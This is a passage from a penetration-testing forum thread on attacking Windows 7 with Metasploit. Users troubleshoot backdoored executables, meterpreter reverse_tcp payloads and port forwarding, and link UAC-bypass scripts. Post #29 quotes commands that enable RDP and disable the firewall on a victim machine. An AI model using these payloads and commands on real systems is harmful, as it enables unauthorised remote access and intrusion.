Page 3 of 4 FirstFirst 1234 LastLast
Results 21 to 30 of 37

Thread: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

  1. #21
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: Riferimento: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by TheAppleMan View Post
    Hi everyone. I'm italian so my english isn't correct xD
    So... i've a problem with meterpreter: when i create it it's ok.
    in lhost i set my external address and in the msfconsole my internal address but when in an other computer (it isn't in my lan) open the file nothing appends, msfconsole receives nothing. Why?
    I do all correctly but... i don't know.
    Anyone can help me?
    Thanks

    Again: Sorry for my bad english

    TheAppleMan
    Did you set up portforwarding ?

  2. #22
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    I was able to make a script only demo of UAC workaround

    http://www.backtrack-linux.org/forum...s-control.html

  3. #23
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    6

    Default Riferimento: Re: Riferimento: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed

    Quote Originally Posted by LHYX1 View Post
    Did you set up portforwarding ?
    Hem.... no!
    Thanks a lot.
    Bye

  4. #24
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: Riferimento: Re: Riferimento: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detai

    I'm surprised that so many people attempt to use metasploit over the internet, and do not know that they need to set up port forwarding, or do not know how. It really pays to have this knowledge first, as using metasploit over the internet is already questionable enough as it is, and our moderators may view this as potentially illegal activity. Not meaning any offense, just something for people to keep in mind.

  5. #25
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    4

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    when i'm trying to make the backdoored .exe I get this message

    Code:
    ./lib/rex/logging/sinks/flatfile.rb:20:in `initialize': Permission denied - /home/rico/.msf3/logs/framework.log (Errno::EACCES)             
            from ./lib/rex/logging/sinks/flatfile.rb:20:in `new'          
            from ./lib/rex/logging/sinks/flatfile.rb:20:in `initialize'   
            from ./lib/msf/base/logging.rb:23:in `new'                    
            from ./lib/msf/base/logging.rb:23:in `init'                   
            from ./lib/msf/base/simple/framework.rb:100:in `simplify'
            from ./lib/msf/base/simple/framework.rb:71:in `create'
            from ./msfpayload:40
    ./lib/rex/logging/sinks/flatfile.rb:20:in `initialize': Permission denied - /home/rico/.msf3/logs/framework.log (Errno::EACCES)
            from ./lib/rex/logging/sinks/flatfile.rb:20:in `new'
            from ./lib/rex/logging/sinks/flatfile.rb:20:in `initialize'
            from ./lib/msf/base/logging.rb:23:in `new'
            from ./lib/msf/base/logging.rb:23:in `init'
            from ./lib/msf/base/simple/framework.rb:100:in `simplify'
            from ./lib/msf/base/simple/framework.rb:71:in `create'
            from ./msfencode:207
    what's the matter? I've installed/uninstalled metasploit 10 times :/

  6. #26
    Just burned his ISO
    Join Date
    Jan 2011
    Posts
    2

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Thank you for the information.

    In order to use this on windows7 you need to specify the payload to be 64x bit.
    set PAYLOAD windows/x64/meterpreter/reverse_tcp

    Also most of the people will have hard time connecting to Win7 due to UAC priviledges.
    Although there is cool script to bypass the uac.
    check this site:
    http://www.secmaniac.com/december-20...s-windows-uac/

  7. #27
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by captainjackrana View Post
    i know this question lies totally out of the topic.. but do the classic metasploit payloads and exploits work for win7 target platforms?
    Depends. A number of the payloads do, as long as you get the CPU architecture right. Most of the payloads are essentially shellcode, and as long as that shellcode uses Windows functions available in Windows 7, doesn't run afoul of any new privilege restricting features and also uses a compatible method for finding the address of kernel32 it should work fine on Windows 7. If you check the asm source (also here and here) for some of these payloads you will actually see that some of them make specific reference to Windows 7.

    Exploits for third party apps that work on Windows XP may also work on Windows 7. Older exploits for Operating Systems components in Windows XP that have since been patched probably wont work on Windows 7.

    Quote Originally Posted by khero View Post
    In order to use this on windows7 you need to specify the payload to be 64x bit.
    set PAYLOAD windows/x64/meterpreter/reverse_tcp
    Only if you are using a 64 bit version of Windows 7...
    Last edited by lupin; 01-07-2011 at 01:51 AM.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  8. #28
    Just burned his ISO
    Join Date
    Jan 2011
    Posts
    2

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by lupin View Post
    Only if you are using a 64 bit version of Windows 7...
    Thanks for the correction, I meant Win7 64 bit but was a bit tired ^^

  9. #29
    Just burned his ISO green0ne's Avatar
    Join Date
    Jan 2011
    Posts
    2

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    {Prepare for RDP}

    Code:

    shell
    # Connect to CMD

    reg add "hklm\system\currentControlSet\Control\Termina l Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
    # Allows incoming terminal service connections

    reg add "hklm\system\currentControlSet\Control\Termina l Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
    # Disables blocking incoming Terminal service connections

    Netsh firewall set opmode enable
    # Enable Firewall on Victim

    Netsh firewall set opmode disable
    # Disable Firewall on Victim
    Just a question from a n00b but shouldn't:
    "# Disables blocking incoming Terminal service connections"
    be before
    "# Allows incoming terminal service connections" ?
    If not why? Wouldn't you want to disable the "blocking" before "allowing" the incoming?
    I'm not critisizing at all just curious of what the best way should be.

    Thanks!

  10. #30
    Just burned his ISO
    Join Date
    Jan 2011
    Posts
    1

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    nice tutorial!

    does this work on xp too?

Page 3 of 4 FirstFirst 1234 LastLast

Similar Threads

  1. Replies: 2
    Last Post: 08-23-2010, 10:53 AM
  2. [Video] Man In The Middle (MITM) Attack (ettercap, metasploit, sbd)
    By imported_g0tmi1k in forum OLD BT4 Videos
    Replies: 6
    Last Post: 01-16-2010, 08:47 PM
  3. Replies: 2
    Last Post: 07-08-2009, 08:56 AM
  4. how to configure Metasploit Client-Side Attack
    By black02 in forum OLD Newbie Area
    Replies: 2
    Last Post: 04-09-2009, 08:03 PM
  5. Some detailed questions about WEP cracking
    By jemenake in forum OLD Wireless
    Replies: 16
    Last Post: 05-01-2007, 09:24 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •